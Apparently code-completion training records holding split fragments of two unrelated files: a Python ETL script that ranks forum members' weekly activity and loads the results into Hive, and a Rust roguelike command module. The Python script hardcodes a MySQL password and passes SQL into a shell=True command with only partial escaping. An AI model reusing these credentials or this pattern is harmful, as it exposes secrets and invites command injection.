postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval) | random_line_split | |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def runHiveQL(s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
|
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval)
| return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
) | identifier_body |
command.rs | use std::fmt::Display;
use GameContext;
use data::Walkability;
use engine::keys::{Key, KeyCode};
use ecs::traits::*;
use graphics::cell::{CellFeature, StairDest, StairDir};
use logic::Action;
use logic::entity::EntityQuery;
use point::{Direction, Point};
use world::traits::*;
use world::{self, World};
use super::debug_command::*;
pub type CommandResult<T> = Result<T, CommandError>;
pub enum CommandError {
Bug(&'static str),
Invalid(&'static str),
Debug(String),
Cancel,
}
/// A bindable command that can be executed by the player.
pub enum Command {
Move(Direction),
UseStairs(StairDir),
Look,
Pickup,
Drop,
Inventory,
Wait,
Quit,
DebugMenu,
Teleport,
}
impl From<Key> for Command {
fn from(key: Key) -> Command {
match key {
Key { code: KeyCode::Escape, .. } => Command::Quit,
Key { code: KeyCode::Left, .. } |
Key { code: KeyCode::H, .. } |
Key { code: KeyCode::NumPad4, .. } => Command::Move(Direction::W),
Key { code: KeyCode::Right, .. } |
Key { code: KeyCode::L, .. } |
Key { code: KeyCode::NumPad6, .. } => Command::Move(Direction::E),
Key { code: KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> |
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn draw_line(start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
}
use renderer::ui::layers::ChoiceLayer;
pub fn menu_choice(context: &mut GameContext, choices: Vec<String>) -> Option<usize> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut ChoiceLayer::new(choices))
})
}
pub fn menu_choice_indexed<T: Display + Clone>(
context: &mut GameContext,
mut choices: Vec<T>,
) -> CommandResult<T> {
let strings = choices.iter().cloned().map(|t| t.to_string()).collect();
let idx = menu_choice(context, strings).ok_or(CommandError::Cancel)?;
Ok(choices.remove(idx))
}
use renderer::ui::layers::InputLayer;
pub fn player_input(context: &mut GameContext, prompt: &str) -> Option<String> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut InputLayer::new(prompt))
})
}
| {
select_tile(context, maybe_examine_tile).map(|_| ())
} | identifier_body |
command.rs | use std::fmt::Display;
use GameContext;
use data::Walkability;
use engine::keys::{Key, KeyCode};
use ecs::traits::*;
use graphics::cell::{CellFeature, StairDest, StairDir};
use logic::Action;
use logic::entity::EntityQuery;
use point::{Direction, Point};
use world::traits::*;
use world::{self, World};
use super::debug_command::*;
pub type CommandResult<T> = Result<T, CommandError>;
pub enum CommandError {
Bug(&'static str),
Invalid(&'static str),
Debug(String),
Cancel,
}
/// A bindable command that can be executed by the player.
pub enum Command {
Move(Direction),
UseStairs(StairDir),
Look,
Pickup,
Drop,
Inventory,
Wait,
Quit,
DebugMenu,
Teleport,
}
impl From<Key> for Command {
fn from(key: Key) -> Command {
match key {
Key { code: KeyCode::Escape, .. } => Command::Quit,
Key { code: KeyCode::Left, .. } |
Key { code: KeyCode::H, .. } |
Key { code: KeyCode::NumPad4, .. } => Command::Move(Direction::W),
Key { code: KeyCode::Right, .. } |
Key { code: KeyCode::L, .. } |
Key { code: KeyCode::NumPad6, .. } => Command::Move(Direction::E),
Key { code: KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
